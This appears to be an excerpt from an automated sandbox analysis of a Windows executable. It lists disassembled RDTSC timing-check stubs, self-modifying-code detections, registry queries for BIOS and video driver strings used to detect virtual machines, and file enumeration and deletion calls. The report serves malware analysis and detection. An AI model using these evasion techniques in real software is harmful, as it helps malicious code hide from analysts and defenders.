                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA11 second address: 9DAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA1D second address: 9DAA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA21 second address: 9DAA33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD0C645EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAB6F second address: 9DAB8B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9FD080A006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F9FD080A012h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAB8B second address: 9DAB95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F9FD0C645E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAD1F second address: 9DAD3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F9FD080A00Fh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E187A second address: 9E18A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E18A0 second address: 9E18AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CC8 second address: 9E1CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CCC second address: 9E1CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CDA second address: 9E1CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CE1 second address: 9E1D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F9FD0EA45C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jbe 00007F9FD0EA45B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1E75 second address: 9E1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FA1 second address: 9E1FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FA5 second address: 9E1FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2204 second address: 9E221B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E221B second address: 9E2225 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2225 second address: 9E224D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F9FD0EA45DBh 0x0000000f js 00007F9FD0EA45BEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E23BC second address: 9E23D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F9FD0CB38BFh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E14BC second address: 9E14DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9FD0EA45B6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9892 second address: 9E9896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9896 second address: 9E98A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9FD0EA45BEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9A1A second address: 9E9A2E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0CB38B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F9FD0CB38B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB201 second address: 9EB205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF18F second address: 9FF194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF194 second address: 9FF1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C7h 0x00000009 jng 00007F9FD0EA45B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F9FD0EA45B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF1C1 second address: 9FF1D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F9FD0CB38B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B474 second address: A0B486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F9FD0EA45BEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B486 second address: A0B48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D6A1 second address: A0D6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C2h 0x00000009 jmp 00007F9FD0EA45C3h 0x0000000e popad 0x0000000f jmp 00007F9FD0EA45C0h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D6DB second address: A0D700 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9FD0CB38D0h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0FA6F second address: A0FA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15797 second address: A157A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F9FD0CB38B8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A157A7 second address: A157CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F9FD0EA45BEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1590F second address: A15913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15913 second address: A1591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15BE1 second address: A15BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15D79 second address: A15D9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9FD0EA45BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15D9A second address: A15DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F9FD0CB38B6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DA9 second address: A15DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DAF second address: A15DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15DBA second address: A15DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160C0 second address: A160CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160CB second address: A160DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A160DE second address: A160F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1966E second address: A19673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935E40 second address: 935E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24178 second address: A2417C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2417C second address: A24196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD0CB38C0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24196 second address: A2419A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2419A second address: A241A4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A241A4 second address: A241C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A241C2 second address: A241C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27CAC second address: A27CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27CB2 second address: A27CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38C33 second address: A38C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9FD0EA45B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38C3F second address: A38C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F9FD0CB38B6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A484E2 second address: A484E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A484E8 second address: A484EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49183 second address: A4918F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F9FD0EA45B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4918F second address: A49195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A492D7 second address: A492DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4AB6B second address: A4AB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D8F3 second address: A4D8F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D8F9 second address: A4D903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D903 second address: A4D913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A518BB second address: A518BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51B24 second address: A51B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51B2A second address: A51B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51B48 second address: A51B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51B4D second address: A51B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F9FD0CB38B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51E1A second address: A51E8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9FD0EA45C5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9FD0EA45B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sbb dx, 6F18h 0x0000002e jo 00007F9FD0EA45B8h 0x00000034 mov edx, eax 0x00000036 push dword ptr [ebp+122D3AACh] 0x0000003c mov edx, dword ptr [ebp+12453B8Ch] 0x00000042 mov edx, 12E15B63h 0x00000047 call 00007F9FD0EA45B9h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51E8A second address: A51E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51E90 second address: A51E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51E95 second address: A51ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F9FD0CB38B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9FD0CB38C9h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9FD0CB38BAh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51ECF second address: A51EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51EE4 second address: A51F0F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9FD0CB38BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d jmp 00007F9FD0CB38BEh 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51F0F second address: A51F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5380C second address: A53810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5524E second address: A5525B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jno 00007F9FD0EA45B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04DC second address: 52B04E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04E2 second address: 52B04E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04E6 second address: 52B0508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9FD0CB38C2h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0508 second address: 52B0525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0525 second address: 52B052B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B052B second address: 52B058B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 call 00007F9FD0EA45C0h 0x00000016 pushfd 0x00000017 jmp 00007F9FD0EA45C2h 0x0000001c jmp 00007F9FD0EA45C5h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B058B second address: 52B0595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 5937F4C5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0603 second address: 52B064F instructions: 0x00000000 rdtsc 0x00000002 mov esi, 0D7900E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 7623CA1Dh 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 jmp 00007F9FD0EA45C8h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dx, 88C0h 0x0000001e call 00007F9FD0EA45C9h 0x00000023 pop ecx 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97093C second address: 97094F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9FD0CB38B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7CDBD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7CDCB6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 987E6F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96C9FE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9F0A4A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37392
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004F40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004EE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004E1710
